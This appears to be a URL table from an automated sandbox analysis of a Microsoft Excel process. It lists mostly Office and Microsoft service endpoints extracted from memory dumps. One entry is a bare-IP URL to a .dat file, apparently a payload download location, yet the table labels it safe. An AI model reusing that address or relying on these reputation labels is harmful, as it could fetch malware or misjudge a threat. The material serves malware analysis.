https://clients.config.office.net/user/v1.0/android/policies;	EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	false		high
https://autodiscover-s.outlook.com/	EXCEL.EXE, 00000000.00000002.965714297.0000000013354000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957360365.0000000013354000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	false		high
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr	EXCEL.EXE, 00000000.00000002.965380107.0000000013197000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	false		high
https://cdn.entity.	7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	false	URL Reputation: safe	unknown
https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/	EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	false		high
https://rpsticket.partnerservices.getmicrosoftkey.com	EXCEL.EXE, 00000000.00000002.965471878.00000000131EE000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	false	URL Reputation: safe	unknown
https://lookup.onenote.com/lookup/geolocation/v1	EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	false		high
http://schemas.open	EXCEL.EXE, 00000000.00000003.811957461.0000000015B00000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812216756.0000000015D0F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.811919748.0000000015D45000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile	EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	false		high
http://185.82.126.78/939602286691.dat2:8	EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://settings.outlook.comS	EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy	EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	false		high
https://api.aadrm.com/	7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	false	URL Reputation: safe	unknown
https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies	7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	false		high
https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=ImmersiveApp	EXCEL.EXE, 00000000.00000002.965380107.0000000013197000.00000004.00000001.sdmp	false		high
https://onedrive.live.com/embed?iom/	EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	false		high
https://api.microsoftstream.com/api/	7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	false		high
https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive	7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	false		high
https://cr.office.com	7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	false		high
https://o365auditrealtimeingestion.manage.office.com/api/userauditrecordx	EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	false		high
https://store.office.de/addinstemplatek2	EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	false		high
https://res.getmicrosoftkey.com/api/redemptionevents	EXCEL.EXE, 00000000.00000002.965471878.00000000131EE000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	false	URL Reputation: safe	unknown
https://tasks.office.com	7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	false		high
https://officeci.azurewebsites.net/api/	EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	false	URL Reputation: safe	unknown
https://login.windows.net/common/oauth2/authorize%	EXCEL.EXE, 00000000.00000002.965471878.00000000131EE000.00000004.00000001.sdmp	false		high
https://store.office.cn/addinstemplate	7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	false	URL Reputation: safe	unknown
https://cr.office.comn	EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech	EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	false		high
https://www.odwebp.svc.ms	EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	false	URL Reputation: safe	unknown
https://api.powerbi.com/v1.0/myorg/groups	EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	false		high
https://web.microsoftstream.com/video/	EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	false		high
https://api.addins.store.officeppe.com/addinstemplate	EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	false	URL Reputation: safe	unknown
https://graph.windows.net	EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	false		high
https://substrate.office.comu	EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://api.onedrive.comcent	EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json	EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	false		high
https://ncus.contentsync.	EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	false	URL Reputation: safe	unknown
https://augloop.office.comLinkRequestApiPageTitleRetrievalhttps://uci.	EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/	7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	false		high
http://weather.service.msn.com/data.aspx	EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	false		high
https://substrate.office.comP	EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://management.azure.comv	EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://substrate.office.comV	EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://substrate.office.comU	EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	false		unknown
https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios	EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	false		high
https://api.diagnostics.office.comom	EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml	7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	false		high
https://wus2.contentsync.	EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	false	URL Reputation: safe	unknown
https://login.windows.net/common/oauth2/authorized	EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	false		high
https://login.windows.net/common/oauth2/authorizee	EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965471878.00000000131EE000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	false		high
https://clients.config.office.net/user/v1.0/ios	7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	false		high
https://login.windows.net/common/oauth2/authorizeX	EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	false		high
https://login.windows.net/common/oauth2/authorizeY	EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	false		high
https://o365auditrealtimeingestion.manage.office.com	EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	false		high
https://outlook.office365.com/api/v1.0/me/Activities	EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	false		high
https://cortana.ai0	EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://login.windows.net/common/oauth2/authorizeP	EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965471878.00000000131EE000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	false		high
